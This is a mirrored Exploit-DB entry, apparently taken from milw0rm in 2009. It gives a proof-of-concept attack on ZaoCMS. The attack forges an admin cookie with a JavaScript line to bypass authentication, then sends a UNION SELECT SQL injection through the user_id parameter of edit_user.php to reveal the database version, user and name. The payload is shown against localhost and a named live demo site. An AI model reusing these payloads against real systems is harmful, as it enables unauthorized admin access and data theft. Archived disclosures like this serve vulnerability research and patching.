bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/8769.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

39 lines
No EOL
1.3 KiB
Text
Raw Permalink Blame History

|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_w_,
( : / (_) / ( .
=By: Qabandi
=Email: iqa[a]hotmail.fr
From Kuwait PEACE
=Vuln: ZaoCMS - SQL Injection Vulnerability
=INFO: http://zaocms.com/
=BUY: http://zaocms.com/
=DORK: --
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@-SQL-Injection-PoC-@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
First we need to use the "Insecure cookiue handling" vulnerability, found at http://milw0rm.com/exploits/8763
You add the cookie, javascript:document.cookie="admin=stgAdmin;path=/";
then go to:
http://localhost/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--
LIVE DEMO:
http://demo.zaocms.com/admin/modules/Users/edit_user.php?user_id=3 UNION SELECT 1,2,version(),4,USER(),6,DATABASE(),8,9,10,11,12--
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-==-==-=-3la-ra7atkum-shabab-=-:P=-=-=-==-=-==-=-=-=-=-=-=-=-
=-=-=-=-==-=-=-=-=-=-No--More---Private=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Salamz: Killer Hack, Mr.Mn7os, Ghost-r00t, All muslim hackers.
Special Thanks: ThE g0bL!N
# milw0rm.com [2009-05-22]
Reference in a new issue View git blame Copy permalink